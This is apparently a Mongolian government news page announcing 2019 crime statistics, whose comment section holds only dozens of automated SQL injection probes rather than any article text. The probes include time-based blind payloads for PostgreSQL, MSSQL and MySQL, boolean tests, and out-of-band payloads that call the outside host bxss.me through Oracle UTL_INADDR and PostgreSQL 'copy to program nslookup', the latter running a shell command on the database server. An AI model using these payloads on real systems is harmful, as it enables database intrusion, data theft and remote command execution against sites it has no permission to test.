• Нүүр хуудас
  • Системүүд
  • Харьяа нэгжүүд
  • Холбоо барих
  • Асуулт хариулт
  • Иргэний хяналт

УЛСЫН ХЭМЖЭЭНД 2019 ОНЫ ЭХНИЙ 5 САРД БҮРТГЭГДСЭН ГЭМТ ХЭРЭГ, ЗӨРЧЛИЙН МЭДЭЭ

2019-06-05
УЛСЫН ХЭМЖЭЭНД 2019 ОНЫ ЭХНИЙ 5 САРД БҮРТГЭГДСЭН ГЭМТ ХЭРЭГ, ЗӨРЧЛИЙН МЭДЭЭ
UkO6s0Pj';select pg_sleep(9); --
2019-09-17 Хариулах
PeHNdHme');select pg_sleep(9); --
2019-09-17 Хариулах
lojK0G4w'));select pg_sleep(9); --
2019-09-17 Хариулах
-1); waitfor delay '0:0:3' --
2019-09-17 Хариулах
1 waitfor delay '0:0:6' --
2019-09-17 Хариулах
VfAEF7U2'; waitfor delay '0:0:6' --
2019-09-17 Хариулах
-1;select pg_sleep(6); --
2019-09-17 Хариулах
-1);select pg_sleep(6); --
2019-09-17 Хариулах
-1));select pg_sleep(9); --
2019-09-17 Хариулах
giSxsPTA'));select pg_sleep(6); --
2019-09-17 Хариулах
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z
2019-09-17 Хариулах
0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z
2019-09-17 Хариулах
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
2019-09-17 Хариулах
-1; waitfor delay '0:0:3' --
2019-09-17 Хариулах
'||UTL_INADDR.get_host_address('dns.'||'sqli.070005.1-85243.1.1cb75.1.bxss'||'.me')||'
2019-09-17 Хариулах
-1);select pg_sleep(9); --
2019-09-17 Хариулах
1;copy (select '') to program 'nslookup dns.sqli.\070005.1-85245.1.1cb75.\1.bxss.me'
2019-09-17 Хариулах
-1));select pg_sleep(3); --
2019-09-17 Хариулах
1';copy (select '') to program 'nslookup dns.sqli.\070005.1-85246.1.1cb75.\1.bxss.me
2019-09-17 Хариулах
hWFOhjqW';select pg_sleep(6); --
2019-09-17 Хариулах
731'
2019-09-17 Хариулах
7IBwsJxZ');select pg_sleep(9); --
2019-09-17 Хариулах
if(now()=sysdate(),sleep(3),0)
2019-09-17 Хариулах
-1); waitfor delay '0:0:3' --
2019-09-17 Хариулах
-1" OR 2+778-778-1=0+0+0+1 --
2019-09-17 Хариулах
1 waitfor delay '0:0:6' --
2019-09-17 Хариулах
-1" OR 3+778-778-1=0+0+0+1 --
2019-09-17 Хариулах
POvXuV2c'; waitfor delay '0:0:9' --
2019-09-17 Хариулах
1||UTL_INADDR.get_host_address('dns.'||'sqli.070005.1-85241.1.1cb75.1.bxss'||'.me')
2019-09-17 Хариулах
-1;select pg_sleep(6); --
2019-09-17 Хариулах